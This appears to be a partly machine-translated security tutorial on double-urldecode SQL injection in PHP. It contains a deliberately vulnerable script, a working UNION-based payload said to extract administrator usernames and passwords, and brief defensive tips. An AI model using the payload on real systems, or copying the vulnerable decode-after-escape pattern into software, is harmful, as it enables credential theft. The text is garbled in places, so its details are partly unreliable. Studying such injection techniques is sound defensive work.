Principle of secondary urldecode injection
Most of the current web programs perform parameter filtering, usually using addslashes(), mysql_real_escape_string(), mysql_escape_string() or turning on GPC to prevent injection. If urldecode or rawurldecode function is used somewhere, it will cause secondary decoding. Generate single quotes to trigger injection.
用下面的代码我们简单的了解一下。
<?php
$w = addslashes($_GET['id']);
$p = urldecode($w);
echo '$w = '.$w.'<br / >';
echo '$p = '.$p;
?>
We submit /1.php?id=1%2527, because there are no single quotes in the parameters we submitted, the result after the first decoding is w = 1 w = 1%27, and %25 is decoded as %. If the program is Use the urldecode or rawurldecode function to decode the id parameter, the result after decoding isw=1 p = 1'The single quote successfully triggered the injection. 
Now that you understand the principle, it is very simple to use.
Utilization of secondary urldecode injection
二次urldecode注入的利用
<?php
$conn = mysqli_connect('127.0.0.1','root','root','qingfeng');
$uid = addslashes($_GET['id']);
$a = urldecode($uid);
$sql = "select * from news where id = '$a'";
$result = mysqli_query($conn,"$sql");
@$row = mysqli_fetch_row($result);
echo ('当前SQL语句:'.$sql.'<br />结果:');
print_r($row);
?>
Open the web page to see the content (picture below).
Looking at the previous principle, we already know that replacing single quotes with %2527 can trigger injection, so here we use it directly.
Closing and commenting are executed successfully, and then you can use joint query like ordinary SQL injection.
id=1%2527 and 1=2 union select username, password from admin-a 
successfully injected data, the administrator's account password.
Defense against secondary urldecode injection
- You can cycle to determine the parameters passed in for execution, and be cautious about externally submitted data.
- When fetching data from the database, you can't easily trust the data you queried.
You can join the group to learn together if you want to do the same escaping or discrimination ! ! !
